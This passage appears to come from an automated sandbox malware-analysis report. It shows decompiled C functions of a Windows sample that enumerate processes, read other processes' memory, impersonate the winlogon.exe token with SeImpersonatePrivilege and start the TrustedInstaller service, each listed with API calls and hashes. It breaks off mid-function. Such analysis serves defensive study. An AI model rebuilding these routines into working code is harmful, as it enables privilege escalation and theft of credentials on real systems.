                                                                                                                            • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                            0x00409924
                                                                                                                            0x0040992c
                                                                                                                            0x00409937
                                                                                                                            0x0040993f
                                                                                                                            0x0040994a
                                                                                                                            0x00409956
                                                                                                                            0x00409962
                                                                                                                            0x0040996e
                                                                                                                            0x00409971
                                                                                                                            0x00409973
                                                                                                                            0x00000000
                                                                                                                            0x00409976
                                                                                                                            0x00409977

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                              • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                            • API String ID: 1529661771-70141382
                                                                                                                            • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                            • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                            • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                            • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2827331108-0
                                                                                                                            • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                            • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                            • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                            • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}





























                                                                                                                            0x00401ac9
                                                                                                                            0x00401ad1
                                                                                                                            0x00401ae1
                                                                                                                            0x00401ae7
                                                                                                                            0x00401ae9
                                                                                                                            0x00401aec
                                                                                                                            0x00401c1b
                                                                                                                            0x00401af2
                                                                                                                            0x00401af2
                                                                                                                            0x00401af8
                                                                                                                            0x00401b0c
                                                                                                                            0x00401b12
                                                                                                                            0x00401b1a
                                                                                                                            0x00401bfd
                                                                                                                            0x00401b20
                                                                                                                            0x00401b26
                                                                                                                            0x00401b2b
                                                                                                                            0x00401b36
                                                                                                                            0x00401b40
                                                                                                                            0x00401b43
                                                                                                                            0x00401b4a
                                                                                                                            0x00401b54
                                                                                                                            0x00401b55
                                                                                                                            0x00401b56
                                                                                                                            0x00401b57
                                                                                                                            0x00401b58
                                                                                                                            0x00401b63
                                                                                                                            0x00401b68
                                                                                                                            0x00401b69
                                                                                                                            0x00401b77
                                                                                                                            0x00401b7d
                                                                                                                            0x00401b82
                                                                                                                            0x00401b82
                                                                                                                            0x00401b88
                                                                                                                            0x00401b8b
                                                                                                                            0x00401b8e
                                                                                                                            0x00401b91
                                                                                                                            0x00401b98
                                                                                                                            0x00401b9b
                                                                                                                            0x00401ba0
                                                                                                                            0x00401ba5
                                                                                                                            0x00401baa
                                                                                                                            0x00401bac
                                                                                                                            0x00401bac
                                                                                                                            0x00401bb2
                                                                                                                            0x00401bb2
                                                                                                                            0x00401bbe
                                                                                                                            0x00401bc4
                                                                                                                            0x00401bc6
                                                                                                                            0x00401bc8
                                                                                                                            0x00401bc8
                                                                                                                            0x00401bd7
                                                                                                                            0x00401be6
                                                                                                                            0x00401bee
                                                                                                                            0x00401bf0
                                                                                                                            0x00401bf0
                                                                                                                            0x00401c02
                                                                                                                            0x00401c0e
                                                                                                                            0x00401c0e
                                                                                                                            0x00401c23

                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                            • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                            • memset.MSVCRT ref: 00401B4A
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                            • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                              • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                              • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                            • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                            • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                                                                            • String ID: %d %I64x
                                                                                                                            • API String ID: 1126726007-2565891505
                                                                                                                            • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                            • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                            • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                            • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                            0x00401f04
                                                                                                                            0x00401f20
                                                                                                                            0x00401f27
                                                                                                                            0x00401f38
                                                                                                                            0x00401f3f
                                                                                                                            0x00401f4e
                                                                                                                            0x00401f54
                                                                                                                            0x00401f5f
                                                                                                                            0x00401f6e
                                                                                                                            0x00401f72
                                                                                                                            0x00401f77
                                                                                                                            0x00401f78
                                                                                                                            0x00401f91
                                                                                                                            0x00401f7a
                                                                                                                            0x00401f88
                                                                                                                            0x00401f8e
                                                                                                                            0x00401f8e
                                                                                                                            0x00401fa6
                                                                                                                            0x00401fa9
                                                                                                                            0x00401fae
                                                                                                                            0x00401fb0
                                                                                                                            0x00401fb2
                                                                                                                            0x00401fb9
                                                                                                                            0x00401fc2
                                                                                                                            0x00401fca
                                                                                                                            0x00401fd2
                                                                                                                            0x00401fd2
                                                                                                                            0x00401fd7
                                                                                                                            0x00401fd7
                                                                                                                            0x00401fe3

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00401F27
                                                                                                                            • memset.MSVCRT ref: 00401F3F
                                                                                                                              • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                              • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                            • wcslen.MSVCRT ref: 00401F5A
                                                                                                                            • wcslen.MSVCRT ref: 00401F69
                                                                                                                            • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                              • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                              • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                            • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                            • API String ID: 3867304300-2177360481
                                                                                                                            • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                            • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                            • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                            • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                                            0x00401319
                                                                                                                            0x0040131b
                                                                                                                            0x00401327
                                                                                                                            0x0040132b
                                                                                                                            0x0040133a
                                                                                                                            0x0040134b
                                                                                                                            0x0040134b
                                                                                                                            0x0040134e
                                                                                                                            0x0040134e
                                                                                                                            0x00401353
                                                                                                                            0x0040135b

                                                                                                                            APIs
                                                                                                                            • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                            • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                            • String ID: TrustedInstaller
                                                                                                                            • API String ID: 862991418-565535830
                                                                                                                            • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                            • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                            • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                            • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                            0x0040955f
                                                                                                                            0x00409566
                                                                                                                            0x0040956e
                                                                                                                            0x00409576
                                                                                                                            0x00409586
                                                                                                                            0x00409586
                                                                                                                            0x0040956e
                                                                                                                            0x00409592
                                                                                                                            0x004095aa
                                                                                                                            0x00409594
                                                                                                                            0x004095a3
                                                                                                                            0x004095a6
                                                                                                                            0x004095a6

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                            • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                                                                            • API String ID: 1714573020-3385500049
                                                                                                                            • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                            • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                            • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                            • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                            0x0040a348
                                                                                                                            0x0040a34e
                                                                                                                            0x0040a352
                                                                                                                            0x0040a35f
                                                                                                                            0x0040a363
                                                                                                                            0x0040a369
                                                                                                                            0x0040a371
                                                                                                                            0x0040a374
                                                                                                                            0x0040a37c
                                                                                                                            0x0040a380
                                                                                                                            0x0040a383
                                                                                                                            0x0040a386
                                                                                                                            0x0040a388
                                                                                                                            0x0040a388
                                                                                                                            0x0040a38c
                                                                                                                            0x0040a38f
                                                                                                                            0x0040a39f
                                                                                                                            0x0040a3a1
                                                                                                                            0x0040a3a5
                                                                                                                            0x0040a3a5
                                                                                                                            0x0040a3a9
                                                                                                                            0x0040a3aa
                                                                                                                            0x0040a3b3
                                                                                                                            0x0040a3b3
                                                                                                                            0x0040a37c
                                                                                                                            0x0040a371
                                                                                                                            0x0040a3b8
                                                                                                                            0x0040a3be

                                                                                                                            APIs
                                                                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3473537107-0
                                                                                                                            • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                            • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                            • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                            • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                            0x00404951
                                                                                                                            0x00404952
                                                                                                                            0x00404956
                                                                                                                            0x004049a1
                                                                                                                            0x00404958
                                                                                                                            0x00404959
                                                                                                                            0x0040495b
                                                                                                                            0x0040495b
                                                                                                                            0x0040495f
                                                                                                                            0x00404961
                                                                                                                            0x00404963
                                                                                                                            0x0040496d
                                                                                                                            0x00404975
                                                                                                                            0x00404977
                                                                                                                            0x0040497b
                                                                                                                            0x00404985
                                                                                                                            0x0040498a
                                                                                                                            0x0040498e
                                                                                                                            0x00404993
                                                                                                                            0x0040499d
                                                                                                                            0x0040499d

                                                                                                                            APIs
                                                                                                                            • malloc.MSVCRT ref: 0040496D
                                                                                                                            • memcpy.MSVCRT ref: 00404985
                                                                                                                            • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: freemallocmemcpy
                                                                                                                            • String ID: W@
                                                                                                                            • API String ID: 3056473165-1729568415
                                                                                                                            • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                            • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                            • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                            • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
